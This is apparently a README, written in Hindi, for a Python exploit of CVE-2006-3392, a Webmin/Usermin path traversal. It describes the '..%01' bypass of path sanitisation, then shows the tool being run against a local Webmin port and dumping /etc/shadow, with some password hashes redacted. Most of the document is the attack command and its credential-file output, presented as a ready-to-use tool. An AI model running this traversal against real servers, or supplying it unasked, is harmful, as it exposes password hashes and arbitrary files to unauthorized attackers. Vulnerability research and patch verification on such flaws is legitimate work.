
CVE-2006-3392 के लिए Python शोषण, Webmin/Usermin में एक पथ ट्रैवर्सल जो मनमानी फ़ाइल पढ़ने की अनुमति देता है, /etc/shadow को पुनर्प्राप्त करके प्रदर्शित किया गया।
Webmin 1.290 से पहले और Usermin 1.220 से पहले का संस्करण HTML को डिकोड करने से पहले simplify_path फ़ंक्शन को कॉल करता है, जो रिमोट हमलावरों को मनमानी फ़ाइलों को पढ़ने की अनुमति देता है, जैसा कि "..%01" अनुक्रमों का उपयोग करके प्रदर्शित किया गया है, जो "../" अनुक्रमों को हटाने से पहले %01 जैसे बाइट्स को फ़ाइलनाम से हटाए जाने से बच जाता है। नोट: यह CVE-2006-3274 से भिन्न मुद्दा है।
$ python3 CVE-2006-3392.py -u http://127.0.0.1:10000
_______ ________ ___ ___ ___ __ ____ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \ / _ \ / / |___ \___ \ / _ \__ \
| | \ \ / /| |__ ______ ) | | | | | | |/ /_ ______ __) |__) | (_) | ) |
| | \ \/ / | __|______/ /| | | | | | | '_ \______|__ <|__ < \__, |/ /
| |____ \ / | |____ / /_| |_| | |_| | (_) | ___) |__) | / // /_
\_____| \/ |______| |____|\___/ \___/ \___/ |____/____/ /_/|____|
[Coded by Brosck]
[*] File path: /etc/shadow
root:[REDACTED]:17406:0:99999:7:::
daemon:*:17047:0:99999:7:::
bin:*:17047:0:99999:7:::
sys:*:17047:0:99999:7:::
sync:*:17047:0:99999:7:::
games:*:17047:0:99999:7:::
man:*:17047:0:99999:7:::
lp:*:17047:0:99999:7:::
mail:*:17047:0:99999:7:::
news:*:17047:0:99999:7:::
uucp:*:17047:0:99999:7:::
proxy:*:17047:0:99999:7:::
www-data:*:17047:0:99999:7:::
backup:*:17047:0:99999:7:::
list:*:17047:0:99999:7:::
irc:*:17047:0:99999:7:::
gnats:*:17047:0:99999:7:::
nobody:*:17047:0:99999:7:::
libuuid:!:17047:0:99999:7:::
Debian-exim:!:17047:0:99999:7:::
statd:*:17047:0:99999:7:::
sshd:*:17047:0:99999:7:::
mysql:!:17047:0:99999:7:::
proftpd:!:17406:0:99999:7:::
ftp:*:17406:0:99999:7:::
webmaster:[REDACTED]:17406:0:99999:7:::